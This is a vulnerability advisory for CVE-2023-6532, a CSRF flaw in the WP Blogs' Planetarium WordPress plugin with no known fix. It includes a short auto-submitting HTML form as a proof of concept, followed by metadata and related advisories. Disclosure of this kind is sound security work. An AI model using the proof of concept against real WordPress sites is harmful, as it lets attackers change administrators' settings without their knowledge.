WP Blogs' Planetarium <= 1.0 – Settings Update via CSRF | CVE 2023-6532 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=wp-blogs-planetarium%2Fwbp.php" method="POST">
    <input type="text" name="key" value="hacked">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

wp-blogs-planetarium

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-6532.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

05a730bc-2d72-49e3-a608-e4390b19e97f

Timeline

Publicly Published

2023-11-13 (about 6 months ago)

Added

2023-12-18 (about 4 months ago)

Last Updated

2023-12-18 (about 4 months ago)

Other

Published

Title

Published

2023-06-26

Title

Caldera Forms Google Sheets Connector < 1.3 - Access Code Update via CSRF

Published

2014-08-01

Title

Developer Formatter 2013.0.1.40 - devformatter.php Multiple Action CSRF

Published

2024-04-08

Title

Benchmark Email Lite < 4.2 - Cross-Site Request Forgery via page_settings()

Published

2022-08-02

Title

MaxButtons < 9.3 - Arbitrary Settings Update via CSRF

Published

2023-09-25

Title

BEAR for WordPress < 1.1.4 - Arbitrary Settings Update via CSRF